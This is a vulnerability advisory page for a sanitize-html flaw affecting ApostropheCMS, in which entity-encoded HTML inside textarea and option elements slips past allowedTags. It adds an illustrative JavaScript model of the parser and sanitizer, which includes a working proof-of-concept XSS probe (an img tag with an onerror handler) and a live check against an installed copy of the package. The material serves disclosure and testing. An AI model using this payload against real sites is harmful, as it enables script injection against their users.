cvedb.io
CVE-2026-40186
MEDIUM · CVSS 6.1
EPSS exploitation probability: 0%
Published 2026-04-15T21:17:27.523 · Last modified 2026-06-17T10:44:50.393

Summary

ApostropheCMS is an open-source Node.js content management system. A regression introduced in commit 49d0bb7, included in version 2.17.1 of the ApostropheCMS-maintained sanitize-html package, bypasses allowedTags enforcement for text inside nonTextTagsArray elements (textarea and option). ApostropheCMS version 4.28.0 is affected through its dependency on the vulnerable sanitize-html version. The code at packages/sanitize-html/index.js:569-573 incorrectly assumes that htmlparser2 does not decode entities inside these elements and therefore skips output escaping, but htmlparser2 10.x does decode entities before passing text to the ontext callback. As a result, entity-encoded HTML is decoded by the parser and then written directly to the output as literal HTML characters, completely bypassing the allowedTags
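The following is an added illustration, not code from sanitize-html, htmlparser2 or ApostropheCMS. It models the text-handling path the summary describes with a toy tokenizer and a toy sanitizer so the failure mode can be run offline: a parser flag stands in for whether the parser decodes entities before the text callback (the htmlparser2 10.x behaviour), and a sanitizer flag stands in for the skipped escaping inside textarea/option. The probe string is constructed for this example; it uses an entity-encoded closing tag to break out of the allowed textarea, which is one way the decoded characters become live markup. The live check at the end assumes the usual sanitizeHtml(dirty, { allowedTags }) call shape and returns null when the package is not installed.

```javascript
// Added example (not sanitize-html's or htmlparser2's code): a toy model of the
// text-handling path described in the advisory. Only the probe input and the
// small entity table are assumptions made here.

const ENTITY_MAP = { '&lt;': '<', '&gt;': '>', '&amp;': '&', '&quot;': '"' };

// Decode the few entities the probe uses, the way an entity-decoding parser
// hands already-decoded text to its ontext callback.
function decodeEntities(text) {
  return text.replace(/&(?:lt|gt|amp|quot);/g, (m) => ENTITY_MAP[m]);
}

// Standard output escaping for text nodes.
function escapeHtml(text) {
  return text.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Toy tokenizer: open tags, close tags and text only (no attribute parsing,
// no raw-text element rules). `decodeTextEntities` models the parser version.
function tokenize(html, decodeTextEntities) {
  const tokens = [];
  const re = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>|[^<]+/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[2]) {
      tokens.push({ type: m[1] ? 'close' : 'open', name: m[2].toLowerCase() });
    } else {
      tokens.push({ type: 'text', data: decodeTextEntities ? decodeEntities(m[0]) : m[0] });
    }
  }
  return tokens;
}

// Elements whose text the vulnerable code wrote through without escaping.
const NON_TEXT_TAGS = new Set(['textarea', 'option']);

// Sanitizer model: disallowed tags are dropped and text is escaped on output,
// except that with `skipEscapeInNonTextTags` text inside textarea/option is
// written as-is, on the assumption that the parser left its entities encoded.
function sanitize(html, allowedTags, { parserDecodesEntities, skipEscapeInNonTextTags }) {
  const allowed = new Set(allowedTags);
  const stack = [];
  let out = '';
  for (const tok of tokenize(html, parserDecodesEntities)) {
    if (tok.type === 'open') {
      stack.push(tok.name);
      if (allowed.has(tok.name)) out += `<${tok.name}>`;
    } else if (tok.type === 'close') {
      const i = stack.lastIndexOf(tok.name);
      if (i !== -1) stack.length = i;
      if (allowed.has(tok.name)) out += `</${tok.name}>`;
    } else {
      const inNonTextTag = stack.some((t) => NON_TEXT_TAGS.has(t));
      out += inNonTextTag && skipEscapeInNonTextTags ? tok.data : escapeHtml(tok.data);
    }
  }
  return out;
}

// Constructed probe: an entity-encoded closing </textarea> followed by an
// entity-encoded <img> with an event handler. While encoded it is inert text.
const PROBE = '<textarea>&lt;/textarea&gt;&lt;img src=x onerror=alert(1)&gt;</textarea>';

// Run the probe through three combinations of parser behaviour and sanitizer policy.
function demo() {
  const allowedTags = ['textarea'];
  return {
    // Older parser leaves entities encoded, so skipping the escape is harmless.
    oldParserSkip: sanitize(PROBE, allowedTags, { parserDecodesEntities: false, skipEscapeInNonTextTags: true }),
    // Decoding parser plus skipped escape: decoded markup reaches the output raw.
    vulnerable: sanitize(PROBE, allowedTags, { parserDecodesEntities: true, skipEscapeInNonTextTags: true }),
    // Decoding parser plus unconditional escaping: the text stays inert.
    hardened: sanitize(PROBE, allowedTags, { parserDecodesEntities: true, skipEscapeInNonTextTags: false }),
  };
}

// True when a literal <img> tag survived sanitisation, i.e. allowedTags was bypassed.
function bypassed(output) {
  return /<img\b/i.test(output);
}

// Optional live check of whatever sanitize-html is installed locally (assumed
// call shape: sanitizeHtml(dirty, { allowedTags })). Returns null when the
// package cannot be loaded, so the model above still runs stand-alone.
function checkInstalledSanitizeHtml() {
  let sanitizeHtml;
  try { sanitizeHtml = require('sanitize-html'); } catch (e) { return null; }
  const output = sanitizeHtml(PROBE, { allowedTags: ['textarea'] });
  return { output, bypassed: bypassed(output) };
}

const results = demo();
console.log(results);
console.log('model bypass:', bypassed(results.vulnerable), 'hardened:', bypassed(results.hardened));
console.log('installed sanitize-html:', checkInstalledSanitizeHtml());
```

The first mode shows why the skipped escape once looked safe: with entities still encoded, escaping again would double-encode (`&lt;` becoming `&amp;lt;`), so passing the text through was the simple way to avoid that. Once the parser decodes before the callback, the same shortcut emits a closing `</textarea>` and an `<img>` tag as raw output. Always escaping text in the hardened mode is this example's choice, not a description of the project's actual fix; to confirm whether an installed copy is affected, run the live check with the probe and look for a literal `<img` in the result.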

Affected products

apostrophecms — apostrophecms


This product uses data from the NVD API but is not endorsed or certified by the NVD. Informational only; not professional security advice.